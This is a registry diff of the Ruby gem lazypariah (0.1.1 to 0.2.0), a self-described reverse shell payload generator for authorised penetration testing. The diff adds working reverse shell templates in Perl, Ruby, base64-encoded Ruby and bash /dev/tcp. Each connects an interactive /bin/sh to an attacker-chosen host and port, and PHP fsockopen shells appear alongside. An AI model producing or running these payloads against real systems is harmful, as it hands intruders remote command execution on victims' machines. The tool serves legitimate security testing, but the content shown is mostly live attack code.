lazypariah 0.1.1 → 0.2.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of lazypariah might be problematic. Click here for more details.
- checksums.yaml +4 -4
- data/bin/lazypariah +21 -3
- metadata +5 -5
checksums.yaml
CHANGED
|
@@ -1,7 +1,7 @@
|
|
|
1
1
|
---
|
|
2
2
|
SHA256:
|
|
3
|
-
metadata.gz:
|
|
4
|
-
data.tar.gz:
|
|
3
|
+
metadata.gz: bd291a993c069eed15490793163c44f1a71ffa52a14a5764c100e67e9fd83387
|
|
4
|
+
data.tar.gz: '0589412c913bccca3beff307194761fb0e495fdc2b2bb717e8f817587f294874'
|
|
5
5
|
SHA512:
|
|
6
|
-
metadata.gz:
|
|
7
|
-
data.tar.gz:
|
|
6
|
+
metadata.gz: 18ee080a774d2d8606eb52afbc2c8ece30844a42b1dd9717acb55f9f271c81683a465ac2dcdb9fbbd89c8d4868795ea5131ebd631157d6348e46619ed86270d1
|
|
7
|
+
data.tar.gz: 3ebcd058ab7994a3ed8b59b1b0c4df41779c0b349b143c0eac6913e1e71ad7c878f25d9cbe6f71e7a281b0fce707c108cb05dc66929367ffde2905196bddf060
|
data/bin/lazypariah
CHANGED
|
@@ -1,7 +1,7 @@
|
|
|
1
1
|
#!/usr/bin/env ruby
|
|
2
2
|
#
|
|
3
3
|
# Title: LAZYPARIAH
|
|
4
|
-
# Version: 0.
|
|
4
|
+
# Version: 0.2.0
|
|
5
5
|
# Description:
|
|
6
6
|
# LAZYPARIAH is a simple tool for generating various reverse shell payloads
|
|
7
7
|
# on the fly. It is intended to be used only in authorised circumstances by
|
|
@@ -27,7 +27,7 @@ require "erb"
|
|
|
27
27
|
|
|
28
28
|
# Define constants.
|
|
29
29
|
PROGRAM_NAME = "LAZYPARIAH".freeze()
|
|
30
|
-
PROGRAM_VERSION = "0.
|
|
30
|
+
PROGRAM_VERSION = "0.2.0".freeze()
|
|
31
31
|
EXECUTABLE_NAME = "lazypariah".freeze()
|
|
32
32
|
|
|
33
33
|
# Define payload list.
|
|
@@ -53,7 +53,12 @@ PAYLOAD_LIST = [
|
|
|
53
53
|
"php_fd_4_tags",
|
|
54
54
|
"php_fd_5_tags",
|
|
55
55
|
"php_fd_6_tags",
|
|
56
|
-
"
|
|
56
|
+
"perl",
|
|
57
|
+
"perl_c",
|
|
58
|
+
"ruby",
|
|
59
|
+
"ruby_c",
|
|
60
|
+
"ruby_b64",
|
|
61
|
+
"bash_tcp"
|
|
57
62
|
].sort()
|
|
58
63
|
|
|
59
64
|
# Define function for displaying program information.
|
|
@@ -184,6 +189,19 @@ begin
|
|
|
184
189
|
print_output("<?php $sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&5 >&5 2>&5\");?>", url_encode=url_encode)
|
|
185
190
|
when "php_fd_6_tags"
|
|
186
191
|
print_output("<?php $sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&6 >&6 2>&6\");?>", url_encode=url_encode)
|
|
192
|
+
when "perl"
|
|
193
|
+
print_output("use Socket;$i=\"#{ARGV[1]}\";$p=#{ARGV[2]};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};", url_encode=url_encode)
|
|
194
|
+
when "perl_c"
|
|
195
|
+
print_output("perl -e 'use Socket;$i=\"#{ARGV[1]}\";$p=#{ARGV[2]};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'", url_encode=url_encode)
|
|
196
|
+
when "ruby"
|
|
197
|
+
print_output("require \"socket\";exit if fork;c=TCPSocket.new(\"#{ARGV[1]}\",\"#{ARGV[2]}\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end", url_encode=url_encode)
|
|
198
|
+
when "ruby_c"
|
|
199
|
+
print_output("ruby -e 'require \"socket\";exit if fork;c=TCPSocket.new(\"#{ARGV[1]}\",\"#{ARGV[2]}\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'", url_encode=url_encode)
|
|
200
|
+
when "ruby_b64"
|
|
201
|
+
code = Base64.strict_encode64("require \"socket\";exit if fork;c=TCPSocket.new(\"#{ARGV[1]}\",\"#{ARGV[2]}\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end")
|
|
202
|
+
print_output("echo #{code} | base64 -d | ruby", url_encode=url_encode)
|
|
203
|
+
when "bash_tcp"
|
|
204
|
+
print_output("bash -i >& /dev/tcp/#{ARGV[1]}/#{ARGV[2]} 0>&1", url_encode=url_encode)
|
|
187
205
|
end
|
|
188
206
|
end
|
|
189
207
|
end
|
metadata
CHANGED
|
@@ -1,14 +1,14 @@
|
|
|
1
1
|
--- !ruby/object:Gem::Specification
|
|
2
2
|
name: lazypariah
|
|
3
3
|
version: !ruby/object:Gem::Version
|
|
4
|
-
version: 0.
|
|
4
|
+
version: 0.2.0
|
|
5
5
|
platform: ruby
|
|
6
6
|
authors:
|
|
7
7
|
- Peter Funnell
|
|
8
|
-
autorequire:
|
|
8
|
+
autorequire:
|
|
9
9
|
bindir: bin
|
|
10
10
|
cert_chain: []
|
|
11
|
-
date: 2020-11-
|
|
11
|
+
date: 2020-11-22 00:00:00.000000000 Z
|
|
12
12
|
dependencies: []
|
|
13
13
|
description: LAZYPARIAH is a simple tool for generating a range of reverse shell payloads
|
|
14
14
|
on the fly. It is intended to be used only in authorised circumstances by qualified
|
|
@@ -27,7 +27,7 @@ homepage: https://github.com/octetsplicer/LAZYPARIAH
|
|
|
27
27
|
licenses:
|
|
28
28
|
- GPL-3.0+
|
|
29
29
|
metadata: {}
|
|
30
|
-
post_install_message:
|
|
30
|
+
post_install_message:
|
|
31
31
|
rdoc_options: []
|
|
32
32
|
require_paths:
|
|
33
33
|
- lib
|
|
@@ -44,7 +44,7 @@ required_rubygems_version: !ruby/object:Gem::Requirement
|
|
|
44
44
|
requirements:
|
|
45
45
|
- A GNU/Linux or BSD operating system.
|
|
46
46
|
rubygems_version: 3.1.2
|
|
47
|
-
signing_key:
|
|
47
|
+
signing_key:
|
|
48
48
|
specification_version: 4
|
|
49
49
|
summary: A tool for generating reverse shell payloads on the fly.
|
|
50
50
|
test_files: []
|